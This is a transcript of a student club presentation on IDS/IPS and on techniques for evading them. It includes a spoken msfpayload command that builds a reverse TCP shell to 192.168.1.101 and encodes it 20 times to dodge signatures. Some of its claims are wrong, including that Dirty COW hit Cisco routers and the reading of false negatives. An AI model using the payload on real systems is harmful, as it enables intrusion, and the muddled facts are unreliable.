Alrighty, sounds good. So without further ado, my name is Dan. I'm the treasurer for this club. Today I'm going to be giving a presentation on the intrusion detection systems and intrusion prevention systems, respectively. So without further ado, let's get right into it. So really the only way for your network to be entirely secure, or even a device specifically, is to unplug it from the network, bury it underground 6 feet deep, and never look at it again. But that's not really feasible. So you actually have to protect it. And that's where IDSs come in. So an IDS is an intrusion detection system, and it's a physical device or piece of software that monitors networks and/or systems for hacker activity. So in any sort of real-world system, like at United Health Group, at Cisco, at AT&T, any sort of company who actually has some sort of care about what sort of data they have on lock, they will have a SIEM, a Security Information and Event Management System. So what happens there is an event is processed, it's sent to this SIEM, right, so this command center, and then whoever has responsibility of it deals with it respectively. That's basically what an IDS is. So why doesn't a firewall necessarily work? A firewall only protects from the outside in, right? So it's like an exoskeleton. So instead of having something on the inside that a firewall would process, it'd be something on the outside. So in this picture, we're having like the cloud. Really, it's just the internet. So it's going through a router first, then it's processed through a firewall. The firewall is a stopgap between external and internal. But notice how it doesn't do anything else, right? So the firewall is just that. It's a wall. So it's like the Great Wall of China in a sense. So it's great at keeping people out, doesn't do anything when you're inside. It serves no other purpose other than that. And that's where an IDS comes in. So for example, like if you wanted to block like BitTorrent protocol, right, which is inherently hard to block, I mean, you can do that, but there are ways around actually the blocking itself on the firewall. So an IDS actually looks internally for intrusions. So it evaluates a suspected intrusion once it's found and sends off an alarm. So to that SIEM I mentioned previously. You can have all the walls you want, but attackers will still have a way through which to enter. So if you can have a firewall, yeah. You can block all ports, yes. You can block all traffic, yes. But that's not really useful at all. You still need to have port 80 open for web, port 443 for HTTPS, port 21 for FTP, anything like that, and you already have a way in. That's a method of getting in, period. But there are variants to having have an intrusion detection system, right? And that is a network-based, and that's when it just sits on the network and then just looks at all traffic across the board. And then you have a host-based IDS, which runs on individual hosts or devices on the network itself. So what this means is they'll both be analyzing network traffic, right? That's the purpose behind an IDS. But, for example, if you want to have a network-based IDS, then you would route all traffic through there, which I'll explain in a bit, or you'd have different agents installed per server or per computer, let's say. And at that point, they'll say, I'm watching my own traffic, and if I notice something else that's happening, like if I'm attempting to masquerade as something else, then I'll let the event management system know, and then they'll respond accordingly. So the network IDS is placed at strategic points in the network and essentially will perform heuristic analysis and will capture traffic data based on known attack methodologies. So there are two classifications. There's online, which basically deals with traffic in real time. So basically you'd have traffic just fed right into the IDS itself, and then if it can't process it in time, well, you're out of luck. And then you'd have offline, and this deals with stored data entirely. Right? So you'd have a log of all traffic data that's being processed, or rather, all traffic data that's existed in your entire system at various points in time. Your offline IDS will actually go in there and process data, albeit more quickly, but at the sacrifice of, oh, I'm noticing an anomaly, there's something going wrong, I can't do anything now. Great, it's already passed. Well, it's great in hindsight, it's not really effective for actually having something to do as it's happening. So the benefits of a network IDS that it can be set in line, and this means that you have the ability to have any or all traffic route through the IDS for any and all analysis, right? So think of it as a beneficial man-in-the-middle attack, but it defends your systems instead of attacking them. The downsides to that is that alerts can be frequently too many, right? And alerts and rule sets are a very tricky thing, mainly because while copious amounts of traffic can be monitored, the key is for the system to only alert on events of interest, right? And that's the key detail there. So an IDS can raise way too many alerts, which makes the system ultimately yet less useful and reduces the trust you have in that system, period. Alternately, if the IDS rarely raises any sort of alert for any malicious traffic, then you might have a problem there as well. It's a catch-22, honestly. So a host IDS. It's a host IDS runs on individual hosts or various devices throughout the network. Using IDS to monitor something such as a honeypot, for example, which, to explain that in a second, it's not, a honeypot is like a separate little mini system, right? And what it does is you have something very similar, and it's very specifically configured to match parameters that are in your environment, right? Things you'd want to have. Let's say somebody who's like a state actor, for example, right? Like let's say you're AT&T and you've got a honeypot set up. So what they would do, well, the hope is at least for the honeypot to capture any and all traffic, activity, whatever. And if anything changes that is not approved, then you know that somebody's already in your system and is looking around for something. And the useful thing here is you can be alerted every time they're looking for something in specific. So let's say they're wanting to dump password tables using a specific method. You can track and exactly see what they're doing in real time. So there are various detection methods that you can use, signature-based. So what that happens is it is a specific pattern lookup, really. So it's heuristic analysis, and you can look for things like byte sequences in traffic or malware instruction sequences as well. But unfortunately, it's impossible to detect any new instruction sequence at all if it doesn't already have a rule based around that. So for example, when what was cow? It's Dirty Cow, for example. When that came out, there was no signature based around that. So it was, I think it was a vulnerability that affected Cisco switches, or either it was routers. But either way, nobody could detect it until papers were written and actually signatures were developed for it. Anomaly based. It's introduced to help you deal with those unknown attacks. Previously, more often than not, the signature-based method was the best thing out there, honestly. But anomaly-based took over for it as the more large version of things that people look at. So the benefit is that it rose due to malware, right? So the extensive development of malware created the need for having an anomaly-based sort of detection system. And then the downside for that is it can result from many false positives. You have to really configure your rules very specifically and very carefully, otherwise you're going to have a really bad time. And nobody wants that. So the relationship of an IDS basically goes over true positives, true negative, false positive, and false negative. They're somewhat self-explanatory, but true positive is when you actually want something to happen, right? So it happens and it's true. A false negative, for example, is when an IDS essentially fails to alert on malicious traffic, and that's something you do not want at all. The best places that you could want to possibly be are on true positive, more often than not, or false negative at that point. At that point, you can just say, I need to improve something, and great, here's how we can get to it. You really don't want to be in that medium interrange of like true negative and false positive. So what about using an IPS? So an IPS is an intrusion prevention system. It's the next level of an IDS. So it has the ability to monitor network traffic that is essential to defend your systems, but it's all well and good when something's actually happening, right? So you can only have a person respond as quickly or notice something as it's happening in real time, and that's where an IPS comes in. So IPSs use a multitude of response techniques, and these can include, but aren't really limited to, stopping the attack itself, changing the security environment, such as a firewall, if a rule, for example, is added in there and they didn't know it, or changing the attack's content. And I'll go over that. There's a huge list of attacks that I'm actually going to go over as well. IPSs are considered to be more of an extension of IDSs because they both monitor network traffic and or system activity for malicious intent. So how do IPSs extend IDSs? And that's, it's an interesting area. So an IPS can pretty much do everything an IDS can, but more, as I previously said. The main difference is that an IPS takes a more active role. So IPSs are almost always placed in line. So that was having all traffic routed through there in the first place. And they're able to actively prevent or block any intrusions that are detected. Right? So outside of just sending out an alarm or alert as you would with an IDS, an IPS actually will reset a connection, block traffic from an identified attacker. So in addition to that, an IPS can actually help improve network connectivity and reduce congestion. So for example, for CRC errors, they can correct cyclic redundancy check errors. What that is, CRC is used to make sure that data is consistent across the board in both networking devices and in storage units itself. And actually having consistent data across the board is, in a sense, a lot more worthwhile than not. Defragmenting passive packet streams. So fragmenting is a process in the IP protocol which allows you to break up a stream itself into smaller and smaller fragmented byte sizes, right? So the reason for this is back in the old days you would have an MTU, and that is a maximum transmission unit size. So on older routers you'd say you can have a cap of 1500, right? But if you want to send a payload or just regular benign activity that's greater than that, you have to fragment your stream, and that's where fragmentation comes from. So what the IPS does is that let's say you have many of these being sent out at once, right? You want to concatenate that into one, rather, you want to compress it into one single thing to prevent network congestion. And this can actually be used as a DDoS attack, which I will mention coming up soon. It can also help clean up unwanted transport layer and network layer options, which I'm going to leave in the background for now. So there are 4 different classifications of IPSs. So there's network IPS, it monitors the entire network for suspicious traffic. There's a wireless IPS, does the same thing, but for a wireless network instead. And a network behavior analysis system. So this examines network traffic to identify threats that generate unusual flows, such as a distributed denial of service attack, a DDoS, certain forms of malware and or policy violations. A host IPS, and that's essentially an installed software package which monitors a single host for suspicious activity occurring within that host. So there are 3 different detection methods that are the primary source. So there's signature detection, and that's they monitor packets in the network, and then they compare them with pre-configured and predetermined attack patterns known as signatures, and this is heuristic analysis. So there's statistical anomaly detection as well, right? And this is where you monitor network traffic and compare it against an established baseline. So if anything is different from what normal activity is, like let's say you have a weekend, right? Then you know what the activity is on the weekend. If somebody is looking into directory structures or looking to see what passwords are for users, I mean, IT guys aren't in on the weekends, you know. So at that point, what you're going to say is, this is not normal activity. I'm going to investigate this. This is worthy of my attention. Finally, we have stateful protocol analysis detection, and that identifies deviations of a protocol by comparing observed events with predetermined profiles of generally accepted definitions of benign activity. So in a general sense, a lot of work that's done right now for intrusion prevention systems is involved with actually using predetermined behavior and statistical analysis, which is very handy. So there are limitations, though, to an IDS and IPS, and this, well, first of all, is noise. So this severely limits the effectiveness of an IDS or an IPS. You can generate a lot of noise, right? So for example, like in let's say a theater, like let's say you have an air horn going off all the time. Makes it really hard for everybody to hear the movie that you're trying to watch, right? Same sort of principle. It's hard for somebody to identify something in particular amongst all this other garbage that's not necessary. So these things could really be bad packets generated from bugs. Like let's say, for example, you send, actually this is a real world example, where you're sending 2 packets at the same time to, let's say, a robot, right? And you want to have it receive 1 instead. The problem there is that's noise. That's extra information that is completely unnecessary, and it actually bogs down what you can analyze. Real attacks versus false alarms. False alarms will always outnumber real attacks. That is always going to happen, unless you're always like wanting to be in a red system, right? So if you always want to be in a system where somebody's always attacking it, that is the only case where real events will actually overpower false alarms, right? So treat something as everything is benign, more or less. A lot of attacks are meant for outdated software. I mentioned before Dirty Cow. That was meant for a kernel bug, I believe, in the Cisco, Cisco kernel for routers, I think. So in order to mitigate those threats, you'd actually need a constantly changing signature library. Moving on, though, there's signature-based IDSs, and that's like when you're using one of those, they have a lag between time of discovery to time of implementation. And between that point, you can have whatever traffic going on and you will have no idea. You also can't compensate for weak identification and authentication. So if you have a really easy to access password field and it somehow gives you a reverse shell, well, great. That's on somebody else's end, not yours. An IDS or an IPS can't really prevent that, especially if it's encrypted. Unless the server has the private key of the server that you are talking to, it cannot understand and know exactly what you're sending over. So IDSs can actually be vulnerable to the same problems that you're trying to prevent on its own. So if somebody identifies this as the system that's the primary sort of shield, then they'll just target that instead, and you got to be pretty careful about that. So let's go over some evasion techniques, and these are pretty fun. So moving on, we got payload obfuscation. So the first one is encoding and encryption. So application layer protocols like HTTP allow for multiple different kinds of encodings, which allow it to be interpreted as the same value. So you're seeing, for example, in the string, CGI bin in a URL can be that string. It will be seen differently on the IDS as just that string, right? So it's unencrypted, it's just a little stream. But what happens on the HTTP server instead is it'll see that as CGI bin, right? So you can do the exact same sort of attack to avoid detection by an IDS, except do it over HTTPS, right? So pretty simple, pretty easy. So unless the IDS, as I mentioned before, has a copy of the private key of the server that you are trying to attack, then the IDS will not be able to match your traffic with a signature based on what it's looking for. Secondly, polymorphism. So as previously mentioned, signature-based IDSs often look for common attack patterns. So polymorphic attacks don't have a single detection signature, making them very difficult for signature-based IDSs and even some anomaly-based IPSs to detect as well. Things like I mentioned before, the rapid development of malware. That was an example. So if you want to say, let's say I'm going to create 4 different sets of malware and then launch them all at the same time, then if they're all going to change every time, then great, you can do that. The best example is to use the Metasploit framework. So we've mentioned Metasploit a couple times in here. For those who don't know, it's a little framework that is part of Kali Linux. You can download for free, as pretty much everything on there. And what it allows you to do, that I'll show you in the next slide, right? Yeah, in the next slide. So I'll show you exactly how it works, right? So essentially, you'll obfuscate let's say the malicious shellcode that you've got, and then just launch it, run it, good to go. So to explain it, that is a single line that you can use to get a reverse shell that looks like a Visual Basic script. So to explain, actually, is this thing on so I can use this laser pointer? Nope. OK, so the command itself is msf payload windows shell reverse underscore TCP lhost 192.168.1.101.r. So what this means, it creates a payload with a reverse TCP shell for localhost 192.168.1.101, right? So the next one, a bar, right? So that is known as a pipe. So what that pipes into is MSF encode -E x86, which indicates what sort of architecture we're targeting. So x86-64 means 32-bit, 64-bit. And then to use the specific kind of obfuscation technique. So it's known as, oh God, if I'm pronouncing this right, shikata ganai. And what that is, I think it's much to do about nothing. So it's impossible to know exactly what the original was if you just have the end result, right? And then what that does, you add a C to the end of it and a 20, right? So what that is, I want to obfuscate this over and over again 20 times iteratively, right? So if I have one file, do it once. I have a different file, kind of. Do it again based on that same file. Over and over and over again 20 times until you have a completely different copy than what you already have, so that you can change exactly how the signature is going to look at it. So if it's a VBS file, great, cool, that looks fine to me, nothing wrong here, except you have a reverse shell. Pretty handy at times. So next up is insertion and evasion. So what you can do here is you can do fragmentation and you can do even smaller packets. So I mentioned before where an IDS will actually squash together a bunch of different packets if they have fragmentation to it, right? So in this case, you can split the attack payload into multiple small different packets. So the IDS must reassemble the packet stream in order to detect the attack, right? So you won't evade any IDS that actually will reassemble all of it, but you can work in some areas. Some small packets can be even further modified, so you can complicate assembly and detection. So if you want to obfuscate it or just make sure that this looks like it might be an attack, but I don't know for sure, so I'm just going to let it slide. This is known as a fail-open technique. IDSs and IPSs are exactly like this. Going on, we have overlapping fragments and TCP segments. So what you'd be able to do is craft a series of packets with sequence numbers for TCP configured to overlap with each other. So an example of this would be if you send the first part of the segment, right, and that's 80 bytes, and your payload is 80 bytes. And then you send a second packet that is 76 bytes. Well, in that little area of 4 bytes that you've got left over, that's where you can use that as an attack vector. So When the target assembles the TCP stream, they must then decide what to do with the remaining 4 overlapping bytes. So some OSs will take this older data, and actually some will take the newer data. It's really up in the air. It just depends on the operating system itself. So assuming the IDS does not reassemble the TCP stream in the exact same way as the target, it can be manipulated into either missing a portion of the attack payload or just seeing benign data inserted into your payload, which breaks the attack signature. So you can mask exactly what you're doing just using a few different changes here and there. And that's just really exploiting a protocol that has existed almost since the internet was created. Protocol ambiguities. So some evasion techniques deliberately manipulate how TCP or other IP protocols will work. So for example, in example 1, you will manipulate the TCP urgent pointer as it's handled differently on many different operating systems. So to explain what a urgent pointer is, essentially if you have a TCP stream, right, and you're sending data, right, like let's say I'm just using port 22 SSH and I'm transferring a large set of files, right, but I realize, oh wait, I forgot to include this other very important core file into it. I want to stop exactly what the process is doing, and then I'm going to add an urgent pointer flag, right? At that point, then the packet will be sent over immediately, but because it has that flag set into the header, it'll jump immediately in front of the next packet that would have normally gone, and then say, cut the connection, drop everything I just sent you like that. Otherwise, it would just be sent after everything that you just sent. So if it was a large set of files, the only thing that you'd be able to send is, hey, stop all these files that I'm transferring over. What files? I've already got them. I've already saved them. And at that point, you're kind of stuck. So if the IDS doesn't handle these variations in the same manner as its end hosts, then it's vulnerable to insertion and evasion techniques similar to those mentioned earlier. Are there any questions? Last of all, in the insertion and evasion part, low bandwidth attacks. So attacks that are spread out over a much longer period of time or over a number of source IPs. So this would be very useful if you want to have a very long, like even year-long campaign. And this is even against a single target. So these can be very difficult to pick out against background traffic. It looks normal. It's an anomaly, but at the same time, it's not that common. It doesn't look like we're being attacked, so we shouldn't really worry about it. Only at the points where it's very, very long and very consistent. So, for example, in Technique 1, using a password cracker, which actually will test one password for each user every single day, and you can do it on multiple different machines. Yeah, it'll take a long time. Will you get to it? Sure, maybe, if you do it right. Will you get detected? More than likely not. It looks very similar to just somebody getting their password wrong. Perfectly fine. So denial of service, and this is kind of fun at times. So the first one is CPU exhaustion. So what this is, packets captured by an IDS are stored in a kernel buffer until the CPU is ready to process them. What that means is when you take up all this data, right, and you put it into memory, then you have to continue processing, right? So to illustrate, those of you who don't know, imagine this as like the kernel buffer, right? So you get data, but when you get to the top, you can't really go beyond that. I mean, this is data, right? It's just a piece of memory, and you can't go beyond that. It's not like water in a meniscus like that, where it just hovers above, you know? So what it has to do is it'll set up like this little queue over here, right? And it has to process through that entire queue before it can do anything else new. So it just takes it in the order it received. All right, there are many ways to catch this. A lot of IDSs have caught on to the fact that, yeah, this is a thing. Maybe we should avoid this and actually have our system have as much uptime as possible. But there's a way around it. And the benefit here is we can use algorithmic complexity attacks. Right? So this class of attack is a low bandwidth DOS attack that exploits algorithmic defenses that are present in many common data structures. So for example, one, you can use a regular expression denial of service, a RDOS, and this produces a DOS attack by providing a regular expression that takes a very, very, very long time to evaluate. Memory exhaustion. So to match signatures, an IDS must keep a state or a status of all monitored connections. So sequence numbers, window sizes, and connection states. So if I'm connected, if I've dropped, if I'm actively having a session occurring. So the way to get around this is to start a large number of TCP sessions all at the same time, right? And this consumes the IDS's RAM, and the IDS is forced, as it happens, to utilize virtual memory on the disk, right? Which is much slower than RAM by a huge factor. and it leads to performance problems and drop packets similar to the effects of CPU exhaustion. But with CPU exhaustion, it just continues to process them over and over again. With this, it'll just drop, potentially. Operator fatigue. So this is a fun thing where you can say, hey, I'm just going to send off a bunch of alerts in all different corners of this enterprise and think, oh, wow, we're under a huge amount of attack. But then you disguise exactly what you're looking for under this little tiny non-critical resource. So let's say you want to get a reverse shell on the CEO's laptop, then you would tell the, let's say you're brute forcing into something, you're doing this, and all these different areas, and you can make it very easy to slip under the radar while the operator, which is more often than not a human, is dealing with it, rather unsuccessfully because they're looking for the wrong thing. So that's mostly about the questions. Do you guys have any questions about what I mentioned thus far? Cool. Let's see. To explain really, for some examples of you guys doing the CDC, there's a couple of things you could do. Let's say for an inline IDS and IPS, you can use Snort, right? So you can install that onto your firewall, which will more often not be pfSense. You can use other ones, but that is the big one that a lot of people use. I personally have had difficulty installing it onto pfSense in the past, but when you get it to work, it really works. There's a whole host of multiple other ones you can use. Like, for example, if you want to open it, like let's say I've seen a few people do this, where they bring a TV to the CDC itself, right? And then they have terminal sessions over SSH open on every single one. And then what they do is they just do tail-f on various log files they want to see. And then it'll just give them a list as to this happened here, this happened here, this happened here. And you'll just be able to see really quickly in real time exactly what is changing on every system. So if you want to get login information as to when a user is logging on, for example, like I think it's every 5 minutes for the CDC, you have a user log on to check the status, right? So is your SSH port open? Okay, great. Well, the iSage automated system will go in every 5 minutes, log in with the username and password, right, that's given to it. If it's logging in at, let's say, 10:07, for example, maybe there's something wrong here. You might want to check it out.
Don't do that. We will get mad at you.
What?
Trying to fingerprint the scanner that way.
Oh, yeah. Let's see, what else? There's other actual products you can use. I know for sure Splunk allows you to do that as well. So you can actually set up your own little Splunk server and then install agents, which is kind of like a host IDS in a way. And you can set it to look at multiple different log file or even directories. So if you say, this is going on, this is what changed, I'll notice, okay, I'm noticing a pattern of, let's say they already broke in, right? And you have no idea. Then you'll notice at specific times or just at random points that you'll have this user logged on. These files are being accessed, which isn't really good. You don't want that to happen. So at that point, you can say, okay, great. We're already hacked, and they probably have stolen our flag. Check it. Your flag is stolen. So what you can do then is you can go into, to get points back and such, you can go back at your logs, which you already have and know where to look, and say, hey, this is what happened. Here's what they did. Great. Now you get points back. That's what you can do to use it. IDSs and IPSs, they're very useful for large enterprise and corporate systems. On very small scale networks, you can do it very easily with just Linux itself. But at the end of the day, I mean, it's up to you how you want to do it. If you want to look at each individual thing all at the same time, or just even one thing, on a small scale, it works really well. On a larger scale, not so much, just much harder. This makes it a lot easier to manage multiple different points of entry, and it prevents a lot of stuff from happening that you normally wouldn't be able to notice. Alrighty, I think that's all the stuff I've got. Are there any questions? Alrighty, cool. That's pretty much it.